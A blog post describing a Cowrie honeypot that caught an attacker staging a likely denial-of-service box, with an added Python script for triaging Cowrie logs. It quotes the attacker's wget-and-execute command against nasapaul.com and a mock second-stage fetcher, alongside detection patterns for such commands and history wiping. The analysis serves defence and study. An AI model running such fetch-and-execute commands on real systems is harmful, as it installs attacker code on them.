“We need to stop using the term ‘script kiddie’ and start respecting the attacker.”

I can’t remember if it was an article or a lecture, but the author made a valuable point: some of the most damaging breaches have been executed by people who used point-and-click tools. Case in point: TalkTalk, a large UK ISP, was breached in recent years by teenagers using third-party scripts and tools¹. It didn’t require an in-depth understanding of web services, database design or SQL to breach these guys. The lesson for every blue teamer is clear: respect the attacker.

On the evening of 28th September 2018, I deployed the Cowrie honeypot (it’s very good indeed) onto a DigitalOcean VPS. My honeypot was configured to permit root logins with any password you like. The aim was to try to capture some malware so that I could dabble in the effervescent hobby of reverse engineering. Within an hour of deploying the droplet, my IP was already being scanned.

Once a scanner had successfully logged in, its first job was to execute `uname -a` and `lscpu`. Fair enough: if I were an attacker, I would want to know some basic information about the box, and to compose a list of the most interesting boxes I’ve got a handle on. I expected some legitimate traffic to follow soon, but it was two days later, on 30th September, before the interesting stuff started.

In the GIF below, you’ll see a playback of the commands executed by the attacker on the honeypot.

Yeah, perl doesn’t exist on this system and actually

You’ll notice that I haven’t tried to hide the attacker’s IP address or the hostnames involved, because there are lessons to be learned about hiding your tracks. In this case, the IP address ties back to Romania, and the wget target is a whole ’nother part of this story.
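The sessions described above can be rebuilt from Cowrie’s own JSON log rather than from a screen recording, and that is where the “hiding your tracks” lesson bites: Cowrie records every command server-side, so a closing `history -c` changes nothing. The following is an added example, not code from the original post or from the Cowrie project. The event and field names are Cowrie’s real ones; the log lines, IPs, session ids, hashes and the stand-in downloaded script are constructed for the example, and the recon/download-and-execute heuristics are this example’s own, not Cowrie’s.

```python
# Added example: triage a Cowrie JSON log into per-session summaries, then
# read a captured download statically for its next-stage URL instead of
# running it. Log content below is constructed; event/field names are Cowrie's.
import json
import re
from collections import defaultdict

# Constructed stand-in for var/log/cowrie/cowrie.json (one JSON object per line).
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6","timestamp":"2018-09-28T20:31:02Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6","timestamp":"2018-09-28T20:31:03Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6","timestamp":"2018-09-28T20:31:04Z"}
{"eventid":"cowrie.command.input","input":"lscpu","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6","timestamp":"2018-09-28T20:31:04Z"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.10","session":"a1b2c3d4e5f6","timestamp":"2018-09-28T20:31:05Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","session":"0f1e2d3c4b5a","timestamp":"2018-09-30T09:12:40Z"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","src_ip":"198.51.100.7","session":"0f1e2d3c4b5a","timestamp":"2018-09-30T09:12:41Z"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget -q http://nasapaul.com/ninfo && chmod +x ninfo && ./ninfo","src_ip":"198.51.100.7","session":"0f1e2d3c4b5a","timestamp":"2018-09-30T09:12:45Z"}
{"eventid":"cowrie.session.file_download","url":"http://nasapaul.com/ninfo","outfile":"var/lib/cowrie/downloads/5e884898da28","shasum":"5e884898da28","src_ip":"198.51.100.7","session":"0f1e2d3c4b5a","timestamp":"2018-09-30T09:12:46Z"}
{"eventid":"cowrie.command.input","input":"history -c","src_ip":"198.51.100.7","session":"0f1e2d3c4b5a","timestamp":"2018-09-30T09:12:50Z"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.7","session":"0f1e2d3c4b5a","timestamp":"2018-09-30T09:12:51Z"}
"""

# Constructed stand-in for a captured first stage that fetches a second stage.
# This is NOT the real ninfo script; it only mimics the shape the post describes.
SAMPLE_DOWNLOAD = """#!/bin/bash
echo "cpus: $(nproc)"
wget -q -O /tmp/v.py http://nasapaul.com/v.py && python /tmp/v.py
"""

RECON_BINARIES = {"uname", "lscpu", "nproc", "free", "id", "whoami", "w", "uptime"}
URL_RE = re.compile(r"https?://[^\s'\"<>|;&]+")
# A fetch followed, on the same command line, by piping into a shell or running something.
FETCH_THEN_EXEC = re.compile(
    r"\b(?:wget|curl)\b.*?(?:\|\s*(?:ba)?sh\b|&&\s*(?:\./|sh\s|bash\s|python\S*\s|perl\s))"
)
ANTI_FORENSICS = ("history -c", "unset HISTFILE", "export HISTFILE=", "rm -f ~/.bash_history")


def parse_log(text):
    """Group Cowrie JSON events by session id: source IP, credentials, commands, downloads."""
    sessions = defaultdict(lambda: {"src_ip": None, "logins": [], "commands": [], "downloads": []})
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        if ev["eventid"] == "cowrie.login.success":
            s["logins"].append((ev["username"], ev["password"]))
        elif ev["eventid"] == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif ev["eventid"] == "cowrie.session.file_download":
            s["downloads"].append(ev["url"])
    return dict(sessions)


def first_words(command):
    """First token of each simple command after splitting on ; && || and |."""
    parts = re.split(r"\s*(?:&&|\|\||;|\|)\s*", command)
    return {p.split()[0] for p in parts if p.split()}


def classify(session):
    """Flag recon, download-and-execute and history wiping; collect every URL seen."""
    cmds = session["commands"]
    urls = set(session["downloads"])
    for c in cmds:
        urls.update(URL_RE.findall(c))
    return {
        "recon": any(first_words(c) & RECON_BINARIES for c in cmds),
        "download_and_execute": any(FETCH_THEN_EXEC.search(c) for c in cmds),
        "anti_forensics": any(c.strip().startswith(ANTI_FORENSICS) for c in cmds),
        "urls": sorted(urls),
    }


def next_stage_urls(downloaded_text):
    """Read a captured download as text and list the URLs it would fetch (no execution)."""
    return sorted(set(URL_RE.findall(downloaded_text)))


def triage(log_text):
    """One summary dict per session, keyed by Cowrie session id."""
    return {sid: dict(src_ip=s["src_ip"], logins=s["logins"], **classify(s))
            for sid, s in parse_log(log_text).items()}


if __name__ == "__main__":
    for sid, info in triage(SAMPLE_LOG).items():
        print(sid, info)
    print("next stage:", next_stage_urls(SAMPLE_DOWNLOAD))
```

The download-and-execute flag is what separates the 28th September recon-only scanner from the 30th September session: a fetch chained straight into execution on one command line. Captured files land under Cowrie’s downloads directory named by hash, so the next-stage URL can be pulled out of the file as text, which is how the ninfo → v.py chain below can be followed without ever running either script.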

The point of the honeypot was to analyse some malware, but in the ethos of ‘respect your attacker’ I set out to analyse what the attacker wanted with my box.

So what’s behind nasapaul.com/ninfo?

nasapaul.com/ninfo — system information bash script

Simply put, ninfo was a bash script which outputs some metrics about the host you’ve compromised and then attempts to retrieve and execute nasapaul.com/v.py.

v.py, then, is nothing more than a speedtest.net check, measuring the server’s bandwidth.

Why bother going out and checking the bandwidth of a compromised box?

As far as I can see, there’s only one reason you’d want a popped box’s bandwidth statistics, and that’s if you’re working on setting up a denial-of-service network.

What about that nasapaul.com domain? It was so overt that I might as well have messaged the attacker on Facebook and given him a dressing down for making the game too easy.

This all looks very sketchy already

There’s a lot here to unpack but let’s focus on the highlights.

The second to fifth links along the top are password lists. The last three links are IP ranges belonging to cloud hosting providers, and OSINT on the Huawei data centre. The five locations in white pertain to tools that launch denial-of-service attacks, two of which are recon tools that I’ve seen already. That Facebook logo does indeed link to someone’s profile page, but you cannot attribute the owner of this website to the user of that profile page.

In the source code for this page there is a Skype username, “paul.paul4121”, and a little Google-fu reveals a series of videos posted on YouTube of other boxes “paul.paul4121” has had a go at. I didn’t learn anything new there: the videos are of a user running the same scripts as earlier.

At this stage, I decided not to pull on the thread any further. There was no value beyond digging through the code and the tools, but remember: this was, effectively, point and click. I believe the attacker was contributing to, or involved with setting up, a distributed denial-of-service network. Simply put, by setting up a honeypot and respecting my attacker, I was able to learn a little more about how a (badly organised) red teamer works.

¹ — Boy, 17, admits TalkTalk hacking offences: https://www.bbc.co.uk/news/uk-37990246